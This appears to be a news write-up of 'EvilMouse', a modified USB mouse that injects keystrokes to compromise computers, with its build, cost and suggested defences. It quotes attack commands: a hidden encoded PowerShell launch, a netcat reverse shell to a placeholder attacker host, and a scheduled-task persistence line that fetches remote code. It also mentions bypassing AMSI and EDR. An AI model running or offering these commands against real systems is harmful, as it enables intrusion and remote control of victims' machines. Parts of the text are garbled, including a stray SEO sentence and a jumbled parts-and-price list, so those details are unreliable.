Security researcher NEWO-J has revealed "EvilMouse," a fully functional USB mouse that also functions as a secret keystroke injector, in a glaring example of low-cost hardware-based attacks This article explores evilmouse based usb. . The device, which is less than $44 in parts, circumvents common USB suspicion vectors like rogue thumb drives by imitating a Human Interface Device (HID) to deliver payloads automatically upon connection.

This build highlights endpoint detection flaws in the face of growing physical access threats by utilizing the Raspberry Pi Pico RP2040 Zero microcontroller. Constructing Evilmouse EvilMouse is based on the USB Rubber Ducky from Hak5, but it hides evil inside harmless accessories. A mouse raises no red flags, especially since it still has button functionality and optical tracking, unlike a bare USB stick that employee training has identified. The breakdown of the total bill of materials (BOM) is as follows: Quantity of Components About.

Cost: RP2040 Adafruit Zero 1 $3 $5 2-Port USB Hub Breakout 1 One $6 Amazon Basics Mouse and one $3 USB-C Pigtail Cable 60/40 rosin-core Solder 1 $8 Flux Paste 1 $8 USB-C Data Cable One $6 Kapton Tape $5 Dupont Wires 4 approximately $0.03 About $44. The donor mouse's small shell required precise engineering during construction. The first challenges were using a multi-tool cutter to remove the plastic ribbing and a flathead screwdriver to desolder the white USB connector on the stock PCB.

The RP2040 Zero manages payload execution and HID emulation after being flashed with CircuitPython firmware. A reverse shell that avoids Windows Defender is implemented in seconds using emulated keystrokes that mimic user input, departing from incompatible pico-ducky scripts (optimized for original Pico boards).

Over USB 2.0, key firmware logic injects Ducky by spoofing HID reports.Sequences that resemble scripts include launching PowerShell (powershell.exe -WindowStyle Hidden -enc), encoding base64 payloads for obfuscation, and creating TCP connections (e.g., nc -e cmd.exe attacker_ip 4444). The source code is located at GitHub: NEWO-J/evilmouse. It can be extended to support Rust-based keystroke acceleration, DuckyScript compatibility, or persistence through scheduled tasks (schtasks /create /sc onlogon /tn EvilTask /tr "powershell -ep bypass -c Invoke-WebRequest...").

Demo footage shows a compromise at the admin level: Within five seconds of plugging EvilMouse into "Victim PC A," a Netcat listener shell on "Attacker PC B" is produced, enabling remote code execution (RCE) without the need for EDR alerts. Stealth is increased by features like WMI persistence or hidden CMD windows (-WindowStyle Hidden). The consequences for high-security or air-gapped environments are dire.

EvilMouse reveals flaws in HID trust models, USB hubs relay without question, and contemporary OSes (Windows 11, macOS Sonoma) automatically count mice without user input, despite being designed for education and red teaming. Physical port controls like Kensington locks and USB device whitelisting through Group Policy (DeviceInstallRestrictions) and endpoint behavioral analytics (like CrowdStrike Falcon's HID monitoring) are examples of defenses. NEWO-J recommends the following enhancements: multi-stage payloads, advanced AMSI bypasses (like reflective PE loading), or remote activation through magic packets.

This democratizes sophisticated attacks at $44 compared to over $100 for commercial Duckies, forcing CISOs to reconsider peripheral supply chains.